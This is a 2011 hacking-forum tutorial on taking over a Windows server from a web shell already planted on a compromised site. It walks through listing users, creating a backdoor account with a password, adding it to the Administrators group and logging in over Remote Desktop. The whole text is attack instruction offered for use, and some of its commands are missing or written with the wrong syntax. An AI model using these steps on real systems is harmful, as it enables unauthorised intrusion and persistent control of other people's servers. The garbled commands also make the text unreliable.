
Oktober 05, 2011

Windows Rooting System

Hello guys this tutorial is dedicated to the members of JH.Today am gonna speak about Windows Rooting System or how to gain RDP Access.

Well this is diffirent from *Unix process there we use exploit here we use only commands
and yes if we are not able to execute those commands we can try some alternativ but still the possibilitys to work are really low....Am gonna explane why a bit later.....

What we need:
-Shell atteched on Some Site
-Server must be runing on Windows OS

We access our shell and go to the command console and we frist gonna check who we are:
Code: [Select all]
This command is to check with what user we are running and its can show us like:
Code: [Select all]
Administrator or SystAdmin
Thats good we are running like administrator cool letz see how many users have on the server:
Code: [Select all]
net user
And we gonna see something like :
Code: [Select all]
C:\Users\Administrator>net user

\\SERVER **********

Administrator            Guest                    Remote
Command Successfully executed.
So this means that there are like 3 users on the this server :
So we can try to add a new user ex: Dark-X
Code: [Select all]
net user Dark-X JustHack /add
This command is for adding user with password:
Code: [Select all]
net user Username Password /add
when we execute this command we will get some windows saying:
Code: [Select all]
Command Successfully executed.
now letz check:
Code: [Select all]
net user Dark-X
Will display something like this:
Code: [Select all]
Username:     Dark-X
Name:             Dark-X

Last Time Online:     XX:XX:XX-XX/XX
Local Group:      *User
So we are in group user we need to be in Administrator or Remote to connect on Remote Desktop Connection so we type:
Code: [Select all]
Net localgroup Dark-X Administrator /add
and we will see agaen this line:
Code: [Select all]
Command Successfully executed.
If we see this that means that we have added our user to Administrators group now we can try to connect on RDP and access the whole server.
Windows RDP Starting:
Code: [Select all]
Start Menu=>All Programs=>Accessories=>Remote Desktop Connection
Code: [Select all]
Open Terminal write: rdesktop -u Username -p Password IP
Code: [Select all]
rdesktop IP

Well Guys one more tutorial finished :D
Hope you ganna like it

Cheers.... ~Dark-X


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